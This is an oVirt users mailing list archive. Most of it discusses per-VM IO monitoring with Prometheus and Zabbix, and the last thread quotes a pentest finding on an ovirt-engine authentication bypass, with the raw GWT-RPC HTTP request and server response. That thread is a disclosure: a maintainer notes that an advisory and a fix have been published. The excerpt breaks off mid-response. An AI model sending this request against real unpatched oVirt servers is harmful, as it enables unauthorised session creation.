[ovirt-users] Re: IO per VM monitoring

[Patrick Dubois via Users]

I have different collection schedules depending on the importance of the 
data i'm collecting.  You can adjust as you need accordingly.


For your IO issues you can easily simply poll your machine's IO load 
statistics from the 5/10/15 minute averages.  That will not give you 
precise intervals but certainly will tell you if something is going wrong.


To be honest,  Zabbix is flexible enough to get you what you need even 
if you're not monitoring the metric directly.   Anything you can do to 
raise system visibility is good stuff!


Enjoy!

On 2024-02-13 14:32, Jorge Visentini wrote:

Hi.

I also use Zabbix here. Its problem is that it collects metrics in 
real time, this is not its function.
There are other alternatives like Elasticsearch + metricbeat, but from 
what I've tested, it's very heavy and uses a lot of disk space lol.


I never used Prometheus, I found it interesting. I'll do some tests.

@Patrick Dubois  How often do you collect 
information with Zabbix? Every 1 minute?
Because for example... for the information to be used correctly for 
analysis, we have to have an IO load of at least 1 continuous minute 
so that Zabbix can collect the correct information.


Cheers!

Em ter., 13 de fev. de 2024 às 13:44, Patrick Dubois via Users 
 escreveu:


For detailed monitoring I use Zabbix.  This way I get detailed
metrics
on my hypervisors, VMs as well as my network storage.

If a machine starts generating large IO I get alerts highlighting the
responsible machine as well as the impacted services.  For
example,  you
might get high IO on a VM but also the correlated high latency on
systems sharing the storage.

Sometimes users will report the the high latency, masking the real
problem so it's nice to have a holistic view of the entire
environment.

Patrick.Dubois

On 2024-02-13 11:19, marek wrote:
> hi,
>
> i have prometheus based ovirt hosts monitoring (node_exporter,
> smartcl_exporter, ipmi_exporter)
>
> https://prometheus-community.github.io/ansible/branch/main/ and
alerts
> from https://samber.github.io/awesome-prometheus-alerts/
>
> after i started this monitoring  i found that one VM is overloading
> local storage (so i must check IO limiting documentation as a
homework
> :) )
>
> but my question is
>
> how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)
>
> some qemu/libvirt exporter? some custom text file + node_exporter?
>
> thanks for tips
>
> Marek
> ___
> Users mailing list -- users@ovirt.org
> To unsubscribe send an email to users-le...@ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
>

https://lists.ovirt.org/archives/list/users@ovirt.org/message/6HVHFX464QJPJTVXUFCF7RAGAUFD33HE/
___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:
https://www.ovirt.org/community/about/community-guidelines/
List Archives:

https://lists.ovirt.org/archives/list/users@ovirt.org/message/L4SU7YZ52PO4FPCFBF4NWP6LE67ERSX2/



--
Att,
Jorge Visentini
+55 55 98432-9868___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/KA4XBIMYHVIMMMF57HDWBRQOSPZOBHDP/

[ovirt-users] Re: IO per VM monitoring

[Jorge Visentini]

Hi.

I also use Zabbix here. Its problem is that it collects metrics in real
time, this is not its function.
There are other alternatives like Elasticsearch + metricbeat, but from what
I've tested, it's very heavy and uses a lot of disk space lol.

I never used Prometheus, I found it interesting. I'll do some tests.

@Patrick Dubois  How often do you collect information with
Zabbix? Every 1 minute?
Because for example... for the information to be used correctly for
analysis, we have to have an IO load of at least 1 continuous minute so
that Zabbix can collect the correct information.

Cheers!

Em ter., 13 de fev. de 2024 às 13:44, Patrick Dubois via Users <
users@ovirt.org> escreveu:

> For detailed monitoring I use Zabbix.  This way I get detailed metrics
> on my hypervisors, VMs as well as my network storage.
>
> If a machine starts generating large IO I get alerts highlighting the
> responsible machine as well as the impacted services.  For example,  you
> might get high IO on a VM but also the correlated high latency on
> systems sharing the storage.
>
> Sometimes users will report the the high latency, masking the real
> problem so it's nice to have a holistic view of the entire environment.
>
> Patrick.Dubois
>
> On 2024-02-13 11:19, marek wrote:
> > hi,
> >
> > i have prometheus based ovirt hosts monitoring (node_exporter,
> > smartcl_exporter, ipmi_exporter)
> >
> > https://prometheus-community.github.io/ansible/branch/main/ and alerts
> > from https://samber.github.io/awesome-prometheus-alerts/
> >
> > after i started this monitoring  i found that one VM is overloading
> > local storage (so i must check IO limiting documentation as a homework
> > :) )
> >
> > but my question is
> >
> > how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)
> >
> > some qemu/libvirt exporter? some custom text file + node_exporter?
> >
> > thanks for tips
> >
> > Marek
> > ___
> > Users mailing list -- users@ovirt.org
> > To unsubscribe send an email to users-le...@ovirt.org
> > Privacy Statement: https://www.ovirt.org/privacy-policy.html
> > oVirt Code of Conduct:
> > https://www.ovirt.org/community/about/community-guidelines/
> > List Archives:
> >
> https://lists.ovirt.org/archives/list/users@ovirt.org/message/6HVHFX464QJPJTVXUFCF7RAGAUFD33HE/
> ___
> Users mailing list -- users@ovirt.org
> To unsubscribe send an email to users-le...@ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
> https://lists.ovirt.org/archives/list/users@ovirt.org/message/L4SU7YZ52PO4FPCFBF4NWP6LE67ERSX2/
>


-- 
Att,
Jorge Visentini
+55 55 98432-9868
___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/YUZETDRZTROFPP2CSQX3C4XVNEZBROSN/

[ovirt-users] Re: IO per VM monitoring

[Patrick Dubois via Users]

For detailed monitoring I use Zabbix.  This way I get detailed metrics 
on my hypervisors, VMs as well as my network storage.


If a machine starts generating large IO I get alerts highlighting the 
responsible machine as well as the impacted services.  For example,  you 
might get high IO on a VM but also the correlated high latency on 
systems sharing the storage.


Sometimes users will report the the high latency, masking the real 
problem so it's nice to have a holistic view of the entire environment.


Patrick.Dubois

On 2024-02-13 11:19, marek wrote:

hi,

i have prometheus based ovirt hosts monitoring (node_exporter, 
smartcl_exporter, ipmi_exporter)


https://prometheus-community.github.io/ansible/branch/main/ and alerts 
from https://samber.github.io/awesome-prometheus-alerts/


after i started this monitoring  i found that one VM is overloading 
local storage (so i must check IO limiting documentation as a homework 
:) )


but my question is

how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)

some qemu/libvirt exporter? some custom text file + node_exporter?

thanks for tips

Marek
___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/6HVHFX464QJPJTVXUFCF7RAGAUFD33HE/

___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/L4SU7YZ52PO4FPCFBF4NWP6LE67ERSX2/

[ovirt-users] IO per VM monitoring

[marek]

hi,

i have prometheus based ovirt hosts monitoring (node_exporter, 
smartcl_exporter, ipmi_exporter)


https://prometheus-community.github.io/ansible/branch/main/ and alerts 
from https://samber.github.io/awesome-prometheus-alerts/


after i started this monitoring  i found that one VM is overloading 
local storage (so i must check IO limiting documentation as a homework :) )


but my question is

how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)

some qemu/libvirt exporter? some custom text file + node_exporter?

thanks for tips

Marek
___
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/6HVHFX464QJPJTVXUFCF7RAGAUFD33HE/

[ovirt-users] Re: Internal pentest result : Ovirt-engine authentication bypass

[Jirka Simon]

Hi  Sandro,

Thank you a lot.

Jirka


On 2/12/24 13:20, Sandro Bonazzola wrote:

Hi, thanks for reporting.
An advisory has been published: 
https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-rvxg 

and the fix has been released in ovirt-engine-4.5.6: 
https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6

Builds are on their way to the mirrors.


Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon  
ha scritto:


Hello ovirt comunity.

We had an internal pentest here and one finding is

*Ovirt-engine authentication bypass.*

Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz
, contains an authentication bypass. It is

possible to directly call the CreateUserSessionCommand using
runAction exposed by /ovirt-
engine/webadmin/GenericApiGWTService.

*This action explicitly enables everyone to call it:*
```/
@Override
protected boolean isUserAuthorizedToRunAction() {
    return true;
}
/```

The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:

```

/boolean externalSsoEnabled =

EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
  DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(),
authzName) :
    dbUserDao.getByExternalId(authzName,
params.getPrincipalId());/

```

If this option is enabled, usernames are used to locate users. If
it's disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user.
If the specified user doesn't exist,
the user is created in the system. However, the user doesn't get
assigned any group membership
or rights, therefore the session creation fails because of the
missing Login right.
The attempt to modify the users table can be seen in the SQL error
message when attempting to
use a null value for the username (as the endpoint uses GWT, the
payload is mostly unreadable):

```

/POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz 

14

Final Report: Results of penetration testing (internal, external,
Wi-Fi)
21 December 2023

Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869

7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-

engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT


Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo

n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter

s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm

in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc

edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie

s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2

01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0|
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly;
Max-Age=2147483647; Expires=Wed, 02-Jan-2092
12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close

//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action

ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org

.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6,
firstName, lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01,
2023-12-15